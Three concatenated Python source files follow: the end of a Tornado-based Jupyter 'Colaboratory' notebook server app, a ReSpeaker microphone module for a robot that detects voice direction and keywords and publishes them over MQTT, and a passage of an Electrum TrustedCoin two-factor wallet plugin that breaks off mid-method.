'transport': 'KernelManager.transport',
'keyfile': 'ColaboratoryApp.keyfile',
'certfile': 'ColaboratoryApp.certfile',
'browser': 'ColaboratoryApp.browser',
})
#-----------------------------------------------------------------------------
# ColaboratoryApp
#-----------------------------------------------------------------------------
class ColaboratoryApp(BaseIPythonApplication):
name = 'jupyter-colaboratory'
description = """
The Jupyter Colaboratory.
This launches a Tornado based HTML Server that can run local Jupyter
kernels while storing the notebook files in Google Drive, supporting
real-time collaborative editing of the notebooks.
"""
examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, ProfileDir, Session, MappingKernelManager,
]
flags = Dict(flags)
aliases = Dict(aliases)
kernel_argv = List(Unicode)
_log_formatter_cls = LogFormatter
def _log_level_default(self):
return logging.INFO
def _log_datefmt_default(self):
"""Exclude date from default date format"""
return "%H:%M:%S"
# create requested profiles by default, if they don't exist:
auto_create = Bool(True)
# Network related information.
ip = Unicode('127.0.0.1', config=True,
help="The IP address the notebook server will listen on."
)
def _ip_changed(self, name, old, new):
if new == u'*': self.ip = u''
port = Integer(8844, config=True,
help="The port the notebook server will listen on."
)
port_retries = Integer(50, config=True,
help="The number of additional ports to try if the specified port is not available."
)
certfile = Unicode(u'', config=True,
help="""The full path to an SSL/TLS certificate file."""
)
keyfile = Unicode(u'', config=True,
help="""The full path to a private key file for usage with SSL/TLS."""
)
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
def _cookie_secret_default(self):
return os.urandom(1024)
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from IPython.lib import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(ColaboratoryApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webapp_settings = Dict(config=True,
help="Supply overrides for the tornado.web.Application that the "
"IPython notebook uses.")
jinja_environment_options = Dict(config=True,
help="Supply extra arguments that will be passed to Jinja environment.")
notebook_manager_class = DottedObjectName('IPython.html.services.notebooks.filenbmanager.FileNotebookManager',
config=True,
help='The notebook manager class to use.'
)
kernel_manager_class = DottedObjectName('IPython.html.services.kernels.kernelmanager.MappingKernelManager',
config=True,
help='The kernel manager class to use.'
)
session_manager_class = DottedObjectName('IPython.html.services.sessions.sessionmanager.SessionManager',
config=True,
help='The session manager class to use.'
)
trust_xheaders = Bool(False, config=True,
help=("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL")
)
info_file = Unicode()
def _info_file_default(self):
info_file = "nbserver-%s.json"%os.getpid()
return os.path.join(self.profile_dir.security_dir, info_file)
def init_kernel_argv(self):
"""construct the kernel arguments"""
# Kernel should get *absolute* path to profile directory
self.kernel_argv = ["--profile-dir", self.profile_dir.location]
def init_configurables(self):
# force Session default to be secure
default_secure(self.config)
kls = import_item(self.kernel_manager_class)
self.kernel_manager = kls(
parent=self, log=self.log, kernel_argv=self.kernel_argv,
connection_dir = self.profile_dir.security_dir,
)
kls = import_item(self.notebook_manager_class)
self.notebook_manager = kls(parent=self, log=self.log)
kls = import_item(self.session_manager_class)
self.session_manager = kls(parent=self, log=self.log)
def init_logging(self):
        # This prevents double log messages because tornado uses a root logger that
        # self.log is a child of. The logging module dispatches log messages to a logger
        # and all of its ancestors until propagate is set to False.
self.log.propagate = False
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.web_app = ColaboratoryWebApplication(
self, self.kernel_manager, self.notebook_manager,
self.session_manager,
self.log, self.webapp_settings,
self.jinja_environment_options
)
if self.certfile:
ssl_options = dict(certfile=self.certfile)
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
else:
ssl_options = None
self.web_app.password = self.password
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders)
if not self.ip:
warning = "WARNING: The notebook server is listening on all IP addresses"
if ssl_options is None:
self.log.critical(warning + " and not using encryption. This "
"is not recommended.")
if not self.password:
self.log.critical(warning + " and not using authentication. "
"This is highly insecure and not recommended.")
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info('The port %i is already in use, trying another random port.' % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warn("Permission to listen on port %i denied" % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical('ERROR: the notebook server could not be started because '
'no available port could be found.')
self.exit(1)
@property
def display_url(self):
ip = self.ip if self.ip else '[all ip addresses on your system]'
return self._url(ip)
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i" % (proto, ip, self.port)
def init_signal(self):
if not sys.platform.startswith('win'):
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info('interrupted')
print(self.notebook_info())
sys.stdout.write("Shutdown this notebook server (y/[n])? ")
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith('y') and 'n' not in line.lower():
self.log.critical("Shutdown confirmed")
ioloop.IOLoop.instance().stop()
return
else:
print("No answer for 5s:", end=' ')
print("resuming operation...")
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
ioloop.IOLoop.instance().add_callback(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical("received signal %s, stopping", sig)
ioloop.IOLoop.instance().stop()
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
status = submodule.check_submodule_status()
if status == 'missing':
self.log.warn("components submodule missing, running `git submodule update`")
submodule.update_submodules(submodule.ipython_parent())
elif status == 'unclean':
self.log.warn("components submodule unclean, you may see 404s on static/components")
self.log.warn("run `setup.py submodule` or `git submodule update` to update")
@catch_config_error
def initialize(self, argv=None):
super(ColaboratoryApp, self).initialize(argv)
self.init_logging()
self.init_kernel_argv()
self.init_configurables()
self.init_components()
self.init_webapp()
self.init_signal()
def cleanup_kernels(self):
"""Shutdown all kernels.
        The kernels will shut down by themselves when this process no longer exists,
        but an explicit shutdown allows the KernelManagers to clean up the connection files.
"""
self.log.info('Shutting down kernels')
self.kernel_manager.shutdown_all()
def notebook_info(self):
"Return the current working directory and the server url information"
info = self.notebook_manager.info_string() + "\n"
info += "%d active kernels \n" % len(self.kernel_manager._kernels)
return info + "The IPython Notebook is running at: %s" % self.display_url
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'secure': bool(self.certfile),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def start(self):
""" Start the IPython Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
if self.subapp is not None:
return self.subapp.start()
info = self.log.info
for line in self.notebook_info().split("\n"):
info(line)
info("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).")
self.write_server_info_file()
if self.open_browser:
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warn('No web browser found: %s.' % e)
browser = None
if browser:
b = lambda : browser.open(self.connection_url,
new=2)
threading.Thread(target=b).start()
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
info("Interrupted...")
finally:
self.cleanup_kernels()
self.remove_server_info_file()
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
launch_new_instance = ColaboratoryApp.launch_instance
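# A minimal launch sketch, assuming this module is run directly rather than through a
# packaged console-script entry point; the invocation below uses the flags/aliases
# declared above, and the module path shown is only a placeholder:
#
#     python -m colaboratory --no-browser --port=8844 --ip=127.0.0.1
#
if __name__ == '__main__':
    # launch_instance() parses sys.argv against the declared aliases/flags,
    # then calls initialize() and start() on a ColaboratoryApp instance.
    launch_new_instance()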
|
ears.py
|
# ReSpeaker Microphone Array v2.0 Code for BinBot
# Author: Jon Gillespie
# Waterford Institute of Technology
# IOT Applications in the Robotics Lab
# EARS : Manages all listening capabilities of the BinBot, which can determine the angle of arrival of
# a human's voice and recognise keywords.
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Two separate threads are created:
# 1. Thread One: Angle of Voice Detection
# > Access this variable by reading the global : "ears.scaled_voice_detection_angle_to_255"
# > Publishes the angle to the mqtt cloud feed every 6th cycle
# - VAD Threshold Set : set_vad_threshold(make_code_requested_vad_threshold)
# > Sets the above thread's voice detection threshold; higher values work best in crowded spaces.
# > Expects an Int (0-255) and will scale it up to 0-1000 for the Mic array.
# - VAD Get Threshold : ears.get_scaled_vad_threshold()
# > Returns the scaled version of the threshold (0-255)
# 2. Thread Two: Keyword Recognition
# > Set a new Keyword : ears.add_user_keyword(keyword)
# > Get all the Keywords : ears.get_user_keywords()
# > Determines if any Keywords have been said : "has_recognised_keyword"
# > Sends the Keyword to the Cloud via MQTT upon recognition
#
# MAKECODE Note
# > Must scale the voice detection angle back up from 0-255 to 0-360 to present the user with accurate angles
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
import speech_recognition as sr
import threading
import logging
import time
import usb.util
import usb.core
from .tuning import Tuning
from pi_monitoring_scripts.pub_data import publish
print("EARS | Loading Ears.py Script")
""" User's Keywords for Keyword Recognition """
# Format: ("word", threshold) ... threshold is between 0 and 1. Closer to 0 is more false positives.
user_keywords = [("binbot", 1.0), ("rubbish", 1.0)]
has_recognised_keyword = False
""" Global Variables used by the Mic Array """
vad_threshold = 300
""" Public Global Variables set by the Mic Array thread and available to reference publicly """
# Referenced by Controller (pi_hub.py) >> Ensure used within a polling loop or framework
voice_detection_angle_to_360 = 0
scaled_voice_detection_angle_to_255 = 0
scaled_vad_threshold_to_255 = int(vad_threshold / 1000 * 255)  # keep the published value an integer byte (0-255)
""" Private Global Variables """
vad_range_max = 1000 # Limit Set by MicArray Tuning
mqtt_topic_mic_angle = "micAngleArrival"
mqtt_topic_keyword = "micKeyword"
""" Initialisation of the Mic Array """
# Find the ReSpeaker in the list of devices connected.
dev = usb.core.find(idVendor=0x2886, idProduct=0x0018)
# Loop until ReSpeaker is found - unlikely but for insurance.
while not dev:
print("EARS | Setting Up | Looking for Mic Array")
dev = usb.core.find(idVendor=0x2886, idProduct=0x0018)
if dev:
print("EARS | Setting Up | Found Mic Array")
Mic_tuning = Tuning(dev)
# Mic_tuning.set_HPFONOFF(3) # For the CLI as param
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# VOICE DETECTION ANGLE
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_scaled_voice_detection_angle():
""" Public: Returns the angle of voice detection scaled down to fit in a byte length.
Must be scaled back 'up' to 360 max to represent correct angles """
return scaled_voice_detection_angle_to_255
def _run_voice_detection_angle():
""" Private: create a thread to poll the Mic Array and set the DOA Global Variable """
print("EARS | Voice Detection | Voice Detection Loop Starting")
print("EARS | Voice Detection | VAD: ", vad_threshold)
# Counter to implement simple trigger for publishing to mqtt
mqtt_trigger_counter = 0
# Mic_tuning.set_vad_threshold(vad_threshold)
# Continue this block until the flag is raised to stop the thread - or the user interrupts
while True:
global _is_direction_of_arrival_stop_thread_flag
global voice_detection_angle_to_360
global Mic_tuning
try:
            # Read the voice-detected bool from the Mic tuning script / hardware
is_voice_detected = Mic_tuning.is_voice()
if is_voice_detected:
# Set the 0-360 degree var for direction of arrival
voice_detection_angle_to_360 = Mic_tuning.direction
print("EARS | Voice Detection | Direction of Arrival: ",
voice_detection_angle_to_360)
# Convert the angle to the byte size scale (0-360 to 0-255)
global scaled_voice_detection_angle_to_255
scaled_voice_detection_angle_to_255 = int(voice_detection_angle_to_360 / 360 * 255)
            # Briefly sleep to prevent an unnecessary busy loop
time.sleep(0.3)
# Simple Trigger to Publish the DOA every 6th loop (0.3 * 6) ~1.8 seconds
mqtt_trigger_counter += 1
if mqtt_trigger_counter == 6:
# Publish the angle of arrival to the cloud via mqtt
publish(mqtt_topic_mic_angle, {
"mic_direction_of_arrival": voice_detection_angle_to_360
})
# Once published, reset the trigger
mqtt_trigger_counter = 0
except KeyboardInterrupt:
break
if _is_direction_of_arrival_stop_thread_flag:
print("Direction of Arrival Thread told to stop.")
break
def get_vad_threshold():
""" Public: Returns the voice detection threshold value (to 1000)"""
return vad_threshold
def get_scaled_vad_threshold():
""" Public: Returns the scaled voice detection threshold value (to 255) """
return scaled_vad_threshold_to_255
def set_vad_threshold(make_code_requested_vad_threshold):
""" Public: Re-set the VAD threshold """
    # NOTE: The VAD is accessible via a custom function Jon wrote within tuning.py
# print("" + Mic_tuning.get_VAD())
# Confirm parameter is an int
if isinstance(make_code_requested_vad_threshold, int):
# Ensure parameter is within range
# TODO find out what the range is.
if 0 <= make_code_requested_vad_threshold <= 255:
# Set scaled threshold
global vad_threshold
vad_threshold = int(make_code_requested_vad_threshold / 255 * 1000)
global scaled_vad_threshold_to_255
scaled_vad_threshold_to_255 = make_code_requested_vad_threshold
print("EARS | Voice Detection | VAD: ", vad_threshold)
else:
print("EARS | Voice Detection | ERROR: make_code_requested_vad_threshold - parameter is not within range")
else:
print("EARS | Voice Detection | ERROR: make_code_requested_vad_threshold - parameter is not an Int")
""" Private: Set the target for the direction_of_arrival Thread """
_direction_of_arrival_thread = threading.Thread(
target=_run_voice_detection_angle, daemon=True)
def start_direction_of_arrival_thread():
""" Public: Start the Direction of Arrival Thread """
global _is_direction_of_arrival_stop_thread_flag
_is_direction_of_arrival_stop_thread_flag = False
print("EARS | Voice Detection | Starting Direction of Arrival Thread")
# Create a new thread without any parameters (args)
# global doa_thread
_direction_of_arrival_thread.start()
def stop_direction_of_arrival_thread():
""" Public: Stop the Direction of Arrival Thread """
print("EARS | Voice Detection | Stopping Direction of Arrival Thread")
global _is_direction_of_arrival_stop_thread_flag
_is_direction_of_arrival_stop_thread_flag = True
global _direction_of_arrival_thread
_direction_of_arrival_thread.join()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# KEYWORD RECOGNITION
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_user_keywords():
""" Public: Returns all of the Keywords that the Bot is listening for """
return user_keywords
def add_user_keyword(keyword):
""" Public: Permits user to add a new word to the keywords list.
Saved only during runtime - ephemeral """
# Confirms the keyword is a string
if isinstance(keyword, str):
# Creates the keyword tuple and appends it to the list
pair = (keyword, 1.0)
user_keywords.append(pair)
print("EARS | Keyword Recognition | New Keyword Added: ", keyword)
print("EARS | Keyword Recognition | All User Keywords are: ", user_keywords)
def _keyword_recognition():
""" Private: Main Keyword Recognition Thread Logic """
r = sr.Recognizer()
m = sr.Microphone()
# Continue this block until the flag is raised to stop the thread
while True:
global _is_keyword_recognition_stop_thread_flag
try:
print("EARS | Keyword Recognition | Starting Up...")
# Speech Recognition - ambient noise filter (send mic into it)
with m as source:
r.adjust_for_ambient_noise(source)
print("EARS | Keyword Recognition | Set minimum energy threshold to {}".format(
r.energy_threshold))
# Main thread loop - listens for voices, checks against keywords and provides result...
while True:
print("EARS | Keyword Recognition | Ready and Listening...")
with m as source:
audio = r.listen(source)
print(
"EARS | Keyword Recognition | Voices detected >>> processing for keywords...")
try:
global user_keywords
# Sphinx Keyword Recognition (on-board)
sphinx_value = r.recognize_sphinx(
audio, keyword_entries=user_keywords)
print(
"EARS | Keyword Recognition | * * KEYWORD RECOGNISED * * Sphinx Found: \" {}\"".format(sphinx_value))
# Google Keyword Recognition
# google_value = r.recognize_google(audio, keyword_entries=user_keywords)
# print("EARS | Keyword Recognition | * * KEYWORD RECOGNISED * * Google Found: {}".format(sphinx_value))
global has_recognised_keyword
has_recognised_keyword = True
# In the case of multi match: "BinBot, BinBot, BinBot" we only want to send the first instance of the sentence
single_keyword_method = sphinx_value.split()
# Publish the Keyword to the MQTT Broker (event based)
publish(mqtt_topic_keyword, { "mic_keyword": single_keyword_method[0] })
except sr.UnknownValueError:
print(
"EARS | Keyword Recognition | *EXCEPTION* Unknown Value Heard...")
except sr.RequestError as e:
print(
"EARS | Keyword Recognition | *EXCEPTION* Couldn't request results from Google Keyword Recognition service; {0}".format(e))
if _is_keyword_recognition_stop_thread_flag:
print("Keyword Recognition Thread told to stop.(1)")
break
except Exception:
pass
if _is_keyword_recognition_stop_thread_flag:
print("Keyword Recognition Thread told to stop.(2)")
break
""" Private: Set the target for the Keyword Recognition Thread """
_keyword_recognition_thread = threading.Thread(
target=_keyword_recognition, daemon=True)
def start_keyword_recognition_thread():
""" Public: Start up the Keyword Recognition Thread """
print("EARS | Keyword Recognition | Starting Keyword Recognition Thread")
global _is_keyword_recognition_stop_thread_flag
_is_keyword_recognition_stop_thread_flag = False
# Create a new thread without any parameters (args)
# global _keyword_recognition
_keyword_recognition_thread.start()
def stop_keyword_recognition_thread():
""" Public: Stop the Keyword Recognition Thread """
print("EARS | Keyword Recognition | Stopping Keyword Recognition Thread")
global has_recognised_keyword
has_recognised_keyword = False
global _is_keyword_recognition_stop_thread_flag
_is_keyword_recognition_stop_thread_flag = True
global _keyword_recognition_thread
_keyword_recognition_thread.join()
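# A minimal usage sketch (assumes a ReSpeaker array is attached and the MQTT publish
# helper is configured; the 1-second polling interval is arbitrary): start both worker
# threads, then poll the public globals documented in the header, as pi_hub.py would.
if __name__ == '__main__':
    start_direction_of_arrival_thread()
    start_keyword_recognition_thread()
    while True:
        # scaled_voice_detection_angle_to_255 is 0-255; multiply by 360 / 255 for degrees
        if has_recognised_keyword:
            print("EARS | Demo | Keyword heard near angle",
                  int(scaled_voice_detection_angle_to_255 / 255 * 360))
        time.sleep(1)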
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Avian Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union, Sequence, List
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, avian
from electrum.bip32 import BIP32Node, xpub_type
from electrum.crypto import sha256
from electrum.transaction import PartialTxOutput, PartialTxInput, PartialTransaction, Transaction
from electrum.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import StorageEncryptionVersion
from electrum.network import Network
from electrum.base_wizard import BaseWizard, WizardWalletPasswordSetting
from electrum.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
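# Illustrative sketch only (never called): the hypothetical helper below shows how the
# module-level `server` client above is typically exercised, chaining the documented
# get_terms_of_service/create/auth calls; the xpubs, email and OTP are placeholders.
def _example_cosigner_flow(xpub_hot, xpub_cold, email, otp):
    tos = server.get_terms_of_service()            # plain-text TOS for the default billing plan
    r = server.create(xpub_hot, xpub_cold, email)  # registers the 2-of-3 cosigner resource
    server.auth(r['id'], otp)                      # confirms the Google Authenticator OTP
    return tos, r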
class Wallet_2fa(Multisig_Wallet):
plugin: 'TrustedCoinPlugin'
wallet_type = '2fa'
def __init__(self, db, storage, *, config):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, db, storage, config=config)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.db.get('trustedcoin_billing_addresses', {}),
'segwit': self.db.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.db)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self):
default = self.min_prepay()
n = self.config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay()
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(
self, *,
coins: Sequence[PartialTxInput],
outputs: List[PartialTxOutput],
fee=None,
